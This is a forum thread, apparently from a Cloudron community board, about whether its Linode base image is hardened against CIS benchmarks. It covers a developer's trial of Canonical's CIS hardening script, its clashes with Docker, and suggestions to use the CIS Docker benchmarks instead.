Cloudron on Linode CIS Benchmarks for the Base Image
-
Does the Cloudron application base image on Linode harden against CIS benchmarks?
If not what was the thinking behind not doing so?
Is there a plan to implement this for added security?
-
@dark-shadow currently the Linode image is not checked or hardened against CIS benchmark. Do you have further information on the process to do so?
-
Thanks for the reply here is some further info:
https://ubuntu.com/security/certifications/docs/cis
https://github.com/alivx/CIS-Ubuntu-20.04-Ansible
You can download the full report from here:
https://www.cisecurity.org/benchmark/ubuntu_linux/
Let me know your thoughts
-
I checked this out quickly following https://ubuntu.com/security/certifications/docs/cis-installation.
It seems that CIS is available only under Ubuntu Pro subscription (even though that's free for personal use). I was able to register as personal instance and then run the benchmarks. It installs many packages (like postfix etc) and also configures a whole bunch of stuff. On Cloudron, most things run inside docker so many of them simply won't be configured right since it's configuring the host system and not the containers. It also seems to apply some ufw rules which is incompatible with docker firewall. I learnt about this tool called AIDE (https://www.hackerxone.com/2021/09/23/step-by-step-to-install-aide-on-ubuntu-20-04-lts/) which tracks file changes but I this this also needs to upload reports to a trusted server to track changes (not sure).
Ignoring the subscription aspect, which makes it a no go already since we cannot rely on canonical subscriptions, the best we can do is pick best practices from CIS and apply it to Cloudron's base image.
-
-
Also,
/usr/share/ubuntu-scap-security-guides/cis-hardening/Canonical_Ubuntu_20.04_CIS-harden.sh lvl2_server
has been running for the past 45 minutes and seems stuck inaide --init
. -
@girish I would say pick and choose what is applicable obviously you would know best it's also worth noting there are CIS benchmarks specifically for Docker Containers which might be a better fit. You could combine the two for better hardening.
https://www.cisecurity.org/benchmark/docker/
https://github.com/docker/docker-bench-security
Let me know what you think